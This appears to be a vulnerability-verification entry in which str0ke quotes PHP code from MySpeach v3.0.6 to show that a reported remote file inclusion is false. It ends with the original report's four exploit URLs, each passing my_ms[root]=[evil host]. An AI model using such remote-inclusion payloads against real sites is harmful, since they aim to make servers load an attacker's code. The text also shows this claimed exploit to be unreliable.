[VIM] false: MySpeach v3.0.6 Remote File Inclusion

[str0ke]

<chat.php> first lines of code.
if(!@file_exists($my_ms['root'].'/admin/config.php')){
  exit('<br /><p align="center">MySpeach n est pas encore installé.</p>');
}

<chat_exemple.php>
  include_once("admin/config.php");
  $my_ms['root']=$my_ms["absolu_root"].$my_ms["repertoire"];
  include($my_ms['root'].'/chat.php');

admin/config.php initializes $my_ms["absolu_root"].

<chat_rqst.php>
  if(!isset($_GET['chm'])){ $_GET['chm']=''; }
  if(!isset($_GET['rqst'])){ $_GET['rqst']=''; }
  if(!isset($_GET['count'])){ $_GET['count'] = ''; }
  if(!isset($_GET['titre'])){ $_GET['titre'] = ''; }
// :: fin des def

//::: Location de myspeach
  $my_ms['root']='../myspeach';

<jscript.php>
if(isset($_GET['my_ms[root]']))
{
  exit('et la marmotte elle fais quoi?');
}

// on vérifie si $my_ms['root'] existe bien, qu'il ne contient pas un
code qui pourrai include la page&nbs p;d'un autre site et que le
fichier existe bien sur ce serveur.
if($my_ms["root"] != '' AND file_exists($my_ms["root"].'/error.php')
AND !eregi(':/',$my_ms["root"]))

/str0ke

* Portal Name = MySpeach v3.0.6
* Class = Remote File Inclusion
* Risk = High
* Download = ftp://ftp1.comscripts.com/PHP/1386_myspeach-306.zip

**********************************************************************************
- Exploit:
http://www.site.com/[script path]/chat.php?my_ms[root]=[evil host]
http://www.site.com/[script path]/chat_exemple.php?my_ms[root]=[evil host]
http://www.site.com/[script path]/chat_rqst.php?my_ms[root]=[evil host]
http://www.site.com/[script path]/jscript.php?my_ms[root]=[evil host]
***********************************************************************************